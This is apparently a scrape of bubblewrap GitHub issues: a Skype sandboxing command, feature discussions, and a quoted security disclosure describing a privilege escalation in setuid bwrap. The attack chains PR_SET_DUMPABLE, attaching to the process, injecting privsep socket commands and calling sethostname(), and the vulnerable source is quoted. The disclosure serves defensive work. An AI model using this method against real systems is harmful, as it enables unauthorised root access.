echo "enable-shm = no" > /tmp/skypepulseclientconf/client.conf
bwrap --ro-bind / / --tmpfs /home --bind /home/$USER/.Skype /home/$USER/.Skype --bind /home/$USER/.config/Skype /home/$USER/.config/Skype --tmpfs /tmp --proc /proc --dev /dev --mqueue /dev/mqueue --chdir /home/$USER --unshare-pid --tmpfs /run --ro-bind /run/user/$(id -u) /run/user/$(id -u) --bind /tmp/skypepulseclientconf /home/$USER/.config/pulse --unshare-cgroup-try --setenv DISPLAY ":9" --tmpfs /run/user/$(id -u)/gdm skype
# using bwrap to make all read-only, make pulse work through new client.conf, hide home content except for skype dirs which are writable, new empty tmp, dev and proc, own pid namespace
# optionally use xephyr as display 9 and hide xauth cookie through tmpfs for /run/user/<id>/gdm
We could require the caller to call setenv() early on in their code, but it would seem more general to just expose e.g.:
bubblewrap --setenv LD_LIBRARY_PATH "$(LD_LIBRARY_PATH)"
These tools are not suitable to give to unprivileged users, because it is trivial to turn such access into to a fully privileged root shell on the host.
Broad claim. I don't see any evidence here.
While we allow the creation of a new netns, we don't allow configuring it, so our current support is "host network" or "none".
It would be quite interesting to allow root to delegate access to pre-configured network namespaces to bubblewrap users. This could be something like having an extended attribute or ACL on /proc/$pid/ns/net
? (If /proc
supported xattrs which it doesn't). So maybe we define this as having a /run/bwrap/netns/$netnsname
symlink, and admins which want to grant access to a netns just do:
mkdir /run/bwrap/netns/no-vpn
ln -s /proc/$netnspid/ns/net /run/bwrap/netns/no-vpn/net
setfacl -m u:someuser:rx /run/bwrap/netns/no-vpn
And then a user could do:
bwrap --netns no-vpn
And we would try to readlink
to see whether we could call setns
?
Sebastian Krahmer reported this to the oss-security mailing list.
There is a beautiful, easy to exploit, logical bug within the
bubblewrap program, thats part of the flatpak container-app framework,
but also used with other container solutions.
/usr/bin/bwrap may be installed mode 04755 or with cap_sys_admin and other
file caps. I dont know if there are any dists already shipping it that way,
but the Makefile and some RedHat spec files contain file caps for it.
bubblewrap's aim is to setup a container and seccomp sandbox for programs to be run
as user.
For some reason it sets the PR_SET_DUMPABLE flag, as seen below. The comment about
it looks strange to me. If thats really true, suid programs shouldn't
be forced to play with the dumpable flag to achieve their goal.
Once the dumpable flag is set, there is a chance we could attach to the process,
once the remaining caps are dropped and the whole process runs as user.
Luckily, that happens at line 1707, right after a PrivSep socket has been opened!
Once attached to the (now running as unprived user) process, we can inject
commands into that socket. We could do arbitrary mounts, but won't achieve much, since
the bwrap process is running in its own mount namespace. However, there is
a sethostname() OP, that we can use to affect the hostname of the entire system
(not restricted to UTS namespace). Now, just wait for root or other users to
login and execute bash to use one of the PS expansion bugs to execute code.
(I wonder that has been re-discovered recently, it was already part of the
CVE-2011-0966 attack vector.)
383 acquire_caps (void)
384 {
[...]
422 /* We need the process to be dumpable, or we can't access /proc/self/uid_map */
423 if (prctl (PR_SET_DUMPABLE, 1, 0, 0, 0) < 0)
424 die_with_error ("prctl(PR_SET_DUMPABLE) failed");
425 }
[...]
1422 int
1423 main (int argc,
1424 char **argv)
1425 {
[...]
1440 /* Get the (optional) capabilities we need, drop root */
1441 acquire_caps ();
[...]
1692 if (is_privileged)
1693 {
1694 pid_t child;
1695 int privsep_sockets[2];
1696
1697 if (socketpair (AF_UNIX, SOCK_SEQPACKET | SOCK_CLOEXEC, 0, privsep_sockets) != 0)
1698 die_with_error ("Can't create privsep socket");
1699
1700 child = fork ();
1701 if (child == -1)
1702 die_with_error ("Can't fork unprivileged helper");
1703
1704 if (child == 0)
1705 {
1706 /* Unprivileged setup process */
1707 drop_caps (); // BOOM
1708 close (privsep_sockets[0]);
1709 setup_newroot (opt_unshare_pid, privsep_sockets[1]);
1710 exit (0);
1711 }
1712 else
1713 {
1714 uint32_t buffer[2048]; /* 8k, but is int32 to guarantee nice alignment */
1715 uint32_t op, flags;
1716 const char *arg1, *arg2;
1717 cleanup_fd int unpriv_socket = -1;
1718
1719 unpriv_socket = privsep_sockets[0];
1720 close (privsep_sockets[1]);
1721
1722 do
1723 {
1724 op = read_priv_sec_op (unpriv_socket, buffer, sizeof (buffer),
1725 &flags, &arg1, &arg2);
1726 privileged_op (-1, op, flags, arg1, arg2);
1727 if (write (unpriv_socket, buffer, 1) != 1)
1728 die ("Can't write to op_socket");
1729 }
1730 while (op != PRIV_SEP_OP_DONE);
1731
1732 /* Continue post setup */
1733 }
1734 }
If you do a recursive remount (for instance to readonly) we don't properly handle mounts covering other mounts. For instance, if we have mounts in this order: /foo /foo/bar /foo, then the last one covers the other two, but we will try to remount the first two, probably failing due to the wrong permissions.
To properly handle this we need to parse the mount id and parent id in /proc/*/mountinfo and ordering into account.
Let's describe the rationale for this.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.